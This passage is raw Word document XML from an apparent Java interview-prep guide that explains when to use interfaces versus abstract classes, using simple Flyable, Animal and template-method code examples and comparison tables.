    <w:p w14:paraId="678C4D3F"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C7C58D2" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FD07B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B36761F">
          <v:rect id="_x0000_i1333" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="196833E1" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B0">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Quick Tip for Interview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12"/>
        <w:gridCol w:w="5995"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="20CA6A06" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D9AEC12" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B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Use abstract class when:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B5F4442" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B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Use interface when:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="674F2798" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10523E0D"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need base class behavior/code sharing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E233258"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need multiple inheritance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="0938E599" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62AED2F3"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ome methods have default logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67DFA139"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want a contract to be followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD07B0" w:rsidRPr="00CE4B95" w14:paraId="1CFBEE49" w14:textId="77777777" w:rsidTr="00737DBB">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66CCC28C"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expect future expansion of logic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="585055E4" w14:textId="77777777" w:rsidR="00737DBB" w:rsidRPr="00CE4B95" w:rsidRDefault="00737DBB" w:rsidP="00FD07B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ultiple unrelated classes must implement the same functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C51625F" w14:textId="458830FF" w:rsidR="00195703" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0019570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3A0AA5D2">
          <v:rect id="_x0000_i1334" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF1B6DE" w14:textId="77777777" w:rsidR="00273F1F" w:rsidRPr="00CE4B95" w:rsidRDefault="00273F1F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc196307599"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Where will you use interface and abstract class with real time examples?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w14:paraId="1EFF0337" w14:textId="60BF384B" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">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wesome question! Let's explore </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>when to use an interface vs an abstract class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with real-world examples you can relate to — especially useful in interviews. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382B1BA3" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D5610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B56138">
          <v:rect id="_x0000_i1335" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D02111" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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en to Use an Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139175C0"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 an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5F01CB" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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want to define a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>contract</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD4A7AF" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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ultiple unrelated classes should implement it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52319D5E" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>multiple inheritance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546F1336" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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eal-world Example 1: interface Flyable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4440E651"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Flyable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D09A41"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fly();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BA6783"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B21D366" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB7BC7A"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Bird implements Flyable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C69F03"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fly() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CF1853"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Bird is flying");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE4E0A6"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68B1880"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13791F6" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE74B54"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Airplane implements Flyable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2341C1DD"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fly() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB707F0"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Airplane is flying");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B85510"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EA3F63E"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32A8189"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Here, Bird and Airplane are unrelated but both </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>can fly</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — so we define the behavior via an interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B85CE0" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D5610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F5F964E">
          <v:rect id="_x0000_i1336" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD00418" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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eal-world Example 2: Java Collections API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2639FD56"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String&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B8A662"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t&lt;Integer&gt; set = new HashSet&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD3C4C8"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List, Set, Map are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w: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e can switch between implementations like ArrayList, LinkedList, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66311BEC" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D5610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1161CEE">
          <v:rect id="_x0000_i1337" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="050922D3" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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en to Use an Abstract Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A89B651"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 an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>abstract class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20242E13" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>provide some common code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270850EB" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partially implement behavior</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0514FBD3" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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Classes are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>closely related</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (inheritance hierarchy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110D86D3" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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eal-world Example 1: abstract class Animal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFA16D5"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bstract class Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4ABC79"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bstract void makeSound();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2D58A8" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FAEF1AF"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eat() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357A9972"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Eating...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5D8035"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D0C4A46"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B8A0AD1" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69CDADEB"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Dog extends Animal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129600D7"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makeSound() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAB043C"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Bark");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECE3A40"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89D9BE4"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172505E"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All animals eat (common method), but each makes a different sound — abstract class handles shared logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79821E7B" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D5610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860B433">
          <v:rect id="_x0000_i1338" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD849F3" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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eal-world Example 2: Template Method Design Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7799AD17"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frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, base abstract classes define a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>template</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and subclasses override specific parts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9245F0"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bstract class DataProcessor {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91E852"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bstract void readData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8A6D5A"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bstract void processData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7891EE2F" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="116B6EC6"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execute() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61855268"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adData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B74DA0"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ocessData();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D29D7E7"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94C9E86"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B6A39D7" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D5610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0EDC4EC">
          <v:rect id="_x0000_i1339" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3539F207" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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Interface vs Abstract Class — Quick Analog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16"/>
        <w:gridCol w:w="1350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="1A2626B4" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B06D960" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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cenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20CE01C2" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="083E3482" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="44A775D9"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nrelated classes sharing the same behavior (e.g., Flyable, Serializable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6760D0FC"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terface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="58C439CC" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5571145A"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lated classes with common implementation (e.g., Animal, Shape)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E269237"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bstract Class</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7AEA1DA6" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D5610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CA854A5">
          <v:rect id="_x0000_i1340" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="028061A5" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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 Cheat Shee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50"/>
        <w:gridCol w:w="1554"/>
        <w:gridCol w:w="1350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D5610E" w:rsidRPr="00CE4B95" w14:paraId="48F082CA" w14:textId="77777777" w:rsidTr="00D42F4E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="122E9FA1" w14:textId="77777777" w:rsidR="00D42F4E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D42F4E" w:rsidP="00D5610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riteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
